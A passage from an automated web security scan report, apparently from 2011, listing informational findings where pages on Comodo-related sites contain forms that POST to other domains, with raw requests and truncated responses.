X-TWA-Web: pb:28032
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<div s
...[SNIP]...
<div class="mboxDefault" style="visibility: visible; display: block;width:338px;margin-left:auto;margin-right:auto;" >


<form action="http://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" name="signup" id="signup" method="POST" onsubmit="return signupValidate();" style="width:100%" >
<div id ="signupformErrorMessage" class="formErrorMessage" style="display:none;">
...[SNIP]...

9.3. http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hackerguardian.com
Path:   /pci-compliance/addsupport/ssl-purchase.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /pci-compliance/addsupport/ssl-purchase.html HTTP/1.1
Host: hackerguardian.com
Proxy-Connection: keep-alive
Referer: http://hackerguardian.com/hackerguardian/buy/pci_free_scan.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316362675388r0.6238376419059932; ap=; referrerURL=http%3A//www.comodo.com/e-commerce/; entryURL=http%3A//hackerguardian.com/hackerguardian/buy/pci_free_scan.html; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; optimizelyBuckets=%7B%7D; __utmb=212060173.1.10.1316362681; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:17:24 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 76758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.opti
...[SNIP]...
</script>


<form onsubmit="return wrapvalidate(validate());" name="evssl" id="evssl" method="post" action="https://secure.comodo.com/products/!PlaceOrder" onSubmit="javascript:__utmLinkPost('/G/securepurchase/HG-addsupport_sslpurchase/proceedtocheckout_btn')">
<script type="text/javascript" >
...[SNIP]...

9.4. https://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hackerguardian.com
Path:   /pci-compliance/addsupport/ssl-purchase.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /pci-compliance/addsupport/ssl-purchase.html HTTP/1.1
Host: hackerguardian.com
Connection: keep-alive
Referer: https://hackerguardian.com/hackerguardian/buy/pci_free_scan.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countryName=; loginName=324234234; optimizelyEndUserId=oeu1316362675388r0.6238376419059932; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; __utma=1.620635661.1316362711.1316362711.1316362711.1; __utmc=1; __utmz=1.1316362711.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmx=212060173.; __utmxx=212060173.; optimizelyBuckets=%7B%7D; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmb=212060173.5.10.1316362681; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; ap=; referrerURL=https%3A//www.hackerguardian.com/sas/login.jsp%3Flogin_error%3D1; entryURL=https%3A//hackerguardian.com/hackerguardian/learn/free_vuln_scan.html; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:55:37 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 76758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.opti
...[SNIP]...
</script>


<form onsubmit="return wrapvalidate(validate());" name="evssl" id="evssl" method="post" action="https://secure.comodo.com/products/!PlaceOrder" onSubmit="javascript:__utmLinkPost('/G/securepurchase/HG-addsupport_sslpurchase/proceedtocheckout_btn')">
<script type="text/javascript" >
...[SNIP]...

9.5. http://www.comodoantispam.com/signup.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodoantispam.com
Path:   /signup.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /signup.html HTTP/1.1
Host: www.comodoantispam.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/prove_it.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:40:09 GMT
Content-Type: text/html
Last-Modified: Fri, 05 Nov 2010 21:21:39 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 11809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Comodo Antispam S
...[SNIP]...
<td>
<form name="form1" method="post" action="https://secure.comodo.com/products/!PlaceOrder" onSubmit="return checkForm(this);" >
<table width="100%" border="0" cellspacing="3" cellpadding="3">
...[SNIP]...

9.6. http://www.comodopartners.com/partner/evssl.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/evssl.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /partner/evssl.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:18 GMT
Content-Type: text/html
Content-Length: 8506
Last-Modified: Tue, 12 Oct 2010 00:39:57 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...

9.7. http://www.comodopartners.com/partner/partnerdoc.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/partnerdoc.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /partner/partnerdoc.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:16 GMT
Content-Type: text/html
Content-Length: 17656
Last-Modified: Tue, 01 Feb 2011 23:59:28 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...

9.8. http://www.comodopartners.com/partner/rootkey.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/rootkey.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /partner/rootkey.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:17 GMT
Content-Type: text/html
Content-Length: 9626
Last-Modified: Tue, 12 Oct 2010 00:39:57 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ;">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...

9.9. http://www.comodopartners.com/partner/trustlogo.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/trustlogo.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /partner/trustlogo.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:17 GMT
Content-Type: text/html
Content-Length: 8498
Last-Modified: Tue, 12 Oct 2010 00:39:57 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ;">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...

9.10. http://www.contentverification.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/prove_it.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:40:48 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:21 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Brand
...[SNIP]...
<div id="loginb" style="top: 5px;right:5px;">
<form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onSubmit="return
submitLoginForm(this.loginName, this.loginPassword)">


Account Login <input name="loginName" id="loginName" size="10" type="text" />
...[SNIP]...

9.11. http://www.contentverification.com/certs/BoilingSpringsLoginBox.cer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /certs/BoilingSpringsLoginBox.cer

Issue detail

The page contains a form which POSTs data to the domain secure-bssbank.com. The form contains the following fields:

Request

GET /certs/BoilingSpringsLoginBox.cer HTTP/1.1
Host: www.contentverification.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:02 GMT
Content-Type: application/octet-stream
Content-Length: 4387
Last-Modified: Fri, 15 Dec 2006 13:41:46 GMT
Connection: close
Accept-Ranges: bytes

0...0................Klt...O...0.    *.H.......0..1.0    ..U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U.
..Comodo CA Limited1-0+..U...$Comodo Content Verification Services0..051220000000
...[SNIP]...
<td width="163" colspan="2" style="border: 1px solid #ffffff; border-bottom: 0px;">
<form action="https://secure-bssbank.com/Common/SignOn/SignOn.asp" method="post" id="form1" name="form1" autocomplete="off">
               <table border="0">
...[SNIP]...

9.12. http://www.contentverification.com/logos/login.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /logos/login.html

Issue detail

The page contains a form which POSTs data to the domain www.cr3ativedevelopment.com. The form contains the following fields:

Request

GET /logos/login.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/logos/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:59:15 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 9765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Spoof
...[SNIP]...
</p>
<form name="form1" method="post" action="http://www.cr3ativedevelopment.com/cvc/fprocess.php"> <table>
...[SNIP]...

9.13. http://www.contentverification.com/logos/login.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /logos/login.html

Issue detail

The page contains a form which POSTs data to the domain secure-bssbank.com. The form contains the following fields:

Request

GET /logos/login.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/logos/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:59:15 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 9765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Spoof
...[SNIP]...
<td width="163" colspan="2" style="border: 1px solid #ffffff; border-bottom: 0px;">
<form action="https://secure-bssbank.com/Common/SignOn/SignOn.asp" method="post" id="form1" name="form2" autocomplete="off">
               <table border="0">
...[SNIP]...

9.14. http://www.contentverification.com/logos/logo.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /logos/logo.html

Issue detail

The page contains a form which POSTs data to the domain www.cr3ativedevelopment.com. The form contains the following fields:

Request

GET /logos/logo.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/products/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; currency=USD; region=North%20America; country=US; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:02:04 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 5985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Ide
...[SNIP]...
</p>
<form name="form1" method="post" action="http://www.cr3ativedevelopment.com/cvc/fprocess.php"> <table>
...[SNIP]...

9.15. http://www.contentverification.com/logos/thirdparty.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /logos/thirdparty.html

Issue detail

The page contains a form which POSTs data to the domain www.cr3ativedevelopment.com. The form contains the following fields:

Request

GET /logos/thirdparty.html HTTP/1.1
Host: www.contentverification.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:11:55 GMT
Content-Type: text/html
Content-Length: 6030
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Ide
...[SNIP]...
</p>
<form name="form1" method="post" action="http://www.cr3ativedevelopment.com/cvc/fprocess.php"> <table>
...[SNIP]...

9.16. http://www.enterprisessl.com/ssl-certificate-products/addsupport/ssl-purchase.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.enterprisessl.com
Path:   /ssl-certificate-products/addsupport/ssl-purchase.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.net. The form contains the following fields:

Request

GET /ssl-certificate-products/addsupport/ssl-purchase.html?items=price_retail_comodoevssl_2yr&x=12&y=3 HTTP/1.1
Host: www.enterprisessl.com
Proxy-Connection: keep-alive
Referer: http://www.enterprisessl.com/ssl-certificate-products/addsupport/ssl-evssl.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ap=; referrerURL=http%3A//www.vengine.com/products/prove_it.html; entryURL=http%3A//www.enterprisessl.com/; __utma=1.33002135.1316365450.1316365450.1316365450.1; __utmb=1.1.10.1316365450; __utmc=1; __utmz=1.1316365450.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:03:09 GMT
Content-Type: text/html
Last-Modified: Fri, 02 Sep 2011 05:12:03 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 89573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Digital SSL Certi
...[SNIP]...
<div class="productcontainer" >
           
       <form onSubmit="return validate( );" name="evssl" id="evssl" method="post" action="https://secure.comodo.net/products/!PlaceOrder">
               <input name="contractSignerName" type="hidden" id="contractSignerName" value="" />
...[SNIP]...

9.17. https://www.enterprisessl.com/login.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.enterprisessl.com
Path:   /login.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /login.html HTTP/1.1
Host: www.enterprisessl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:11:25 GMT
Content-Type: text/html
Content-Length: 6518
Last-Modified: Mon, 17 Jan 2011 23:35:17 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>EnterpriseSSL.com
...[SNIP]...
<div id="secuerlogin" style="width:780px; height:145px; background-color:#F1F1F1; margin-top:20px; ">
   <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return    submitLoginForm(this.loginName, this.loginPassword)">
       <table border="0" cellspacing="0" cellpadding="0" align="center" style="margin:auto;">
...[SNIP]...

9.18. http://www.keepitsafe.com/corporate_enterprise.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.keepitsafe.com
Path:   /corporate_enterprise.php

Issue detail

The page contains a form which POSTs data to the domain secure.logmeinrescue.com. The form contains the following fields:

Request

GET /corporate_enterprise.php?utm_source=j2com&utm_medium=xsell-referral&utm_campaign=enterprise&utm_content=keepitsafe HTTP/1.1
Host: www.keepitsafe.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Length: 13659
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="connect">
<form action="https://secure.logmeinrescue.com/Customer/Code.aspx" method="post" name="connectForm" id="connectForm" target="_blank" style="display:none">6 DIGIT SUPPORT CODE: <input name="Code" type="text" id="Code" value="" size="10" maxlength="6" />
...[SNIP]...

9.19. http://www.keepitsafe.com/solutions.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.keepitsafe.com
Path:   /solutions.php

Issue detail

The page contains a form which POSTs data to the domain secure.logmeinrescue.com. The form contains the following fields:

Request

GET /solutions.php HTTP/1.1
Host: www.keepitsafe.com
Proxy-Connection: keep-alive
Referer: http://www.keepitsafe.com/corporate_enterprise.php?utm_source=j2com&utm_medium=xsell-referral&utm_campaign=enterprise&utm_content=keepitsafe
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=119704978.709955153.1316366446.1316366446.1316366446.1; __utmb=119704978.1.10.1316366446; __utmc=119704978; __utmz=119704978.1316366446.1.1.utmcsr=j2com|utmccn=enterprise|utmcmd=xsell-referral|utmcct=keepitsafe

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:20:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 12365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="connect">
<form action="https://secure.logmeinrescue.com/Customer/Code.aspx" method="post" name="connectForm" id="connectForm" target="_blank" style="display:none">6 DIGIT SUPPORT CODE: <input name="Code" type="text" id="Code" value="" size="10" maxlength="6" />
...[SNIP]...

9.20. http://www.trustix.com/login.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trustix.com
Path:   /login.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.net. The form contains the following fields:

Request

GET /login.html HTTP/1.1
Host: www.trustix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:26 GMT
Content-Type: text/html
Content-Length: 3852
Last-Modified: Fri, 15 Dec 2006 15:12:29 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Trust
...[SNIP]...
</p>

<form name="loginForm" method="post" action="https://secure.comodo.net/products/!hostedLogin" onsubmit="return    submitLoginForm(this.loginName, this.loginPassword)">
<table cellspacing="0" cellpadding="0" >
...[SNIP]...

9.21. http://www.trustix.com/support/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trustix.com
Path:   /support/index.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.net. The form contains the following fields:

Request

GET /support/index.html HTTP/1.1
Host: www.trustix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:26 GMT
Content-Type: text/html
Content-Length: 11955
Last-Modified: Fri, 15 Dec 2006 15:12:29 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Trustix&
...[SNIP]...
</table>

<form name="form1" method="post" action="https://secure.comodo.net/products/!placeOrder" onsubmit="return checkForm(this);">
<input type="hidden" name="ap" value="trustix" />
...[SNIP]...

9.22. http://www.vengine.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
